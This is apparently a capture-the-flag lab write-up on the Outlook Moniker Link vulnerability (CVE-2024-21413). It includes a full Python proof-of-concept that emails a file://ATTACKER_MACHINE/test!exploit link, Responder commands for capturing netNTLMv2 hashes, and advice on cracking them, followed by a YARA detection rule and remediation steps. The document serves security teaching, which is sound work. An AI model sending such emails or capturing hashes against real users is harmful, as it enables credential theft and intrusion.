Moniker Link (CVE-2024-21413)

So this one is a real CVE. Not a made up CTF scenario. This is an actual critical vulnerability in Microsoft Outlook that was disclosed in February 2024 and scored a 9.8 out of 10 on the CVSS scale. Yeah. That high.

The vulnerability is called Moniker Link, and the short version is: send someone an email with a specially crafted link, they click it, you get their Windows credentials. That is it. Low attack complexity, no special setup, just an email.

Let’s get into it.

Tasks

Task 1 — Introduction

On February 13th, 2024, Microsoft announced a critical vulnerability in Outlook. The CVE assigned is CVE-2024-21413, and it was discovered by Haifei Li from Check Point Research.

The vulnerability involves something called a Moniker Link. When Outlook processes this type of link in a specific way, it completely bypasses its own security protections, and the victim’s NTLM credentials get sent straight to the attacker the moment they click the link.

Here are the key details:

Low attack complexity with a 9.8 score is scary. This is not some obscure edge case that requires 15 things to go right. It is a bad one.

The affected Office releases are:

For the practical parts of this room you need both the AttackBox and the attached vulnerable machine. Deploy both now and let them spin up.

Question: What “Severity” rating has the CVE been assigned? Critical

Task 2 — Moniker Link (CVE-2024-21413)

To understand why this works, you need to understand what Outlook normally does when it encounters a link.

Outlook renders emails as HTML, which means it can handle clickable hyperlinks. It supports the usual HTTP and HTTPS URLs, but it can also handle something called Moniker Links. These are URLs that point to applications or resources on Windows using a protocol called COM (Component Object Model). One example is the file:// scheme, which tells Windows to go and access a file somewhere.

If you put a file:// link pointing to a network share into an email like this:

<p><a href="file://ATTACKER_IP/test">Click me</a></p>

What actually happens under the hood is that Outlook tries to access that share using SMB, which means it needs to authenticate, which means it sends Windows credentials. That would be very bad for the victim.

But normally Outlook stops this from happening. It has a feature called Protected View, which is basically a sandbox mode for emails. When Outlook detects potentially dangerous content like external links, attachments, or anything that could trigger external connections, it opens the email in read-only mode and blocks the action. So the file link gets stopped before it does anything.

Here is where the vulnerability comes in.

If you add an exclamation mark and any text after the path in the Moniker Link, like this:

<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>

Outlook’s Protected View completely fails to catch it. That one ! character is enough to confuse the protection mechanism into letting the request through. The share does not even need to exist on the attacker’s machine. Outlook will still attempt the authentication, and that attempt is what leaks the credentials.

The RCE part is technically possible because of how COM works on Windows, but there is no public proof of concept for it yet, so this room focuses on the credential leak side of things.

Question: What Moniker Link type do we use in the hyperlink? file://

Question: What is the special character used to bypass Outlook’s “Protected View”? !

Task 3 — Exploitation

Okay so here is what the actual attack looks like in practice.

The goal is to send the victim an email containing our malicious Moniker Link. When they click it, their machine will try to authenticate with our attacking machine over SMB, and we will be sitting with Responder ready to catch the hash.

The room provides a Python PoC for this (also on GitHub at github.com/CMNatic/CVE-2024-21413). Here is what it does:

'''
Author: CMNatic | https://github.com/cmnatic
Version: 1.0 | 19/02/2024
'''

import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender_email = 'attacker@monikerlink.thm'
receiver_email = 'victim@monikerlink.thm'
password = input("Enter your attacker email password: ")
html_content = """\
<!DOCTYPE html>
<html lang="en">
    <p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>
    </body>
</html>"""

message = MIMEMultipart()
message['Subject'] = "CVE-2024-21413"
message["From"] = formataddr(('CMNatic', sender_email))
message["To"] = receiver_email

msgHtml = MIMEText(html_content,'html')
message.attach(msgHtml)

server = smtplib.SMTP('MAILSERVER', 25)
server.ehlo()
try:
    server.login(sender_email, password)
except Exception as err:
    print(err)
    exit(-1)

try:
    server.sendmail(sender_email, [receiver_email], message.as_string())
    print("\n Email delivered")
except Exception as error:
    print(error)
finally:
    server.quit()

The script takes the attacker and victim email addresses, authenticates to the mail server, and sends an HTML email with the Moniker Link embedded as a hyperlink. The mail server is already set up for you in this room. The attacker email password is just attacker.

Before running it, you need to make two edits:

Create the file on the AttackBox with nano exploit.py, paste the script in, make those two changes, and save.

Now start Responder on the AttackBox first, before sending the email. This is the tool that will listen for incoming SMB authentication attempts and capture the hash:

responder -I ens5

If you are on your own machine instead of the AttackBox, the interface name will be different. Use ip a to check.

Once Responder is listening, run the exploit:

python3 exploit.py

Enter attacker when it asks for the password. You should see Email delivered in the terminal.

Now switch over to the vulnerable machine. Open Outlook using the shortcut on the desktop. When it prompts you about signing in, click “I don’t want to sign in or create an account” and dismiss any other popups. The victim’s mailbox is already configured.

You should see the email arrive. Click the “Click me” link inside it.

Flip back to your Responder terminal on the AttackBox and you will see the victim’s netNTLMv2 hash waiting for you.

At this point you could take that hash and throw it at John the Ripper or Hashcat to try and crack the actual password. If the password is weak enough, you are in.

Question: What is the name of the application that we use on the AttackBox to capture the user’s hash? responder

Question: What type of hash is captured once the hyperlink in the email has been clicked? netNTLMv2

Task 4 — Detection

So how do you actually catch this in the wild?

YARA

Florian Roth wrote a YARA rule specifically for this CVE that looks for emails containing the file:\\ pattern in a Moniker Link. Here is what it looks like:

rule EXPL_CVE_2024_21413_Microsoft_Outlook_RCE_Feb24 {

   meta:
      description = "Detects emails that contain signs of a method to exploit CVE-2024-21413 in Microsoft Outlook"
      author = "X__Junior, Florian Roth"
      reference = "https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/"
      date = "2024-02-17"
      modified = "2024-02-19"
      score = 75

   strings:
      $a1 = "Subject: "
      $a2 = "Received: "

      $xr1 = /file:\/\/\/\\\\[^"']{6,600}\.(docx|txt|pdf|xlsx|pptx|...)/

   condition:
      filesize < 1000KB
      and all of ($a*)
      and 1 of ($xr*)
}

The rule checks that the file looks like an email (has Subject and Received headers) and that it contains a file:// Moniker Link pointing at a file with a recognizable extension. It covers a huge list of file types including documents, images, executables, scripts, and more.

Wireshark

If you are looking at network traffic, the SMB authentication attempt from the victim to the attacker is visible in a packet capture. You can see a truncated version of the netNTLMv2 hash in the traffic, which is another indicator that something sketchy happened.

Task 5 — Remediation

Microsoft patched this in February 2024’s Patch Tuesday release. If you are running an affected version of Office, go update it. You can do it through Windows Update or the Microsoft Update Catalog directly. There is a list of the specific KB articles for each Office build on the Microsoft Security Response Center page for this CVE.

What is frustrating about this one is that there is basically nothing you can configure in Outlook itself to prevent the attack on unpatched versions. Protected View, the feature that is supposed to catch exactly this kind of thing, is the thing being bypassed. You cannot fix the bypass by tweaking Outlook settings.

You could try blocking SMB outbound at the firewall level, and that would stop the credential leak specifically. But completely blocking SMB can break legitimate things in an organization like network shares, so it needs to be done carefully and depends heavily on the environment.

The general advice the room gives is worth repeating though: remind users not to click random links, especially in unsolicited emails, and to preview links before clicking them. That kind of basic hygiene would have stopped this specific attack even on unpatched machines.

Task 6 — Conclusion

That was interesting one. A single exclamation mark in a hyperlink is enough to bypass a security feature in one of the most widely used email clients in the world and leak Windows credentials to anyone who sends you an email. The attack complexity is low, the affected surface is massive, and the fix is just patching. Which a lot of people and organizations are slow to do.

The key takeaways from this room are how Protected View works and why it fails here, how Moniker Links trigger SMB authentication, and how Responder can sit quietly and collect credentials when that authentication attempt comes through.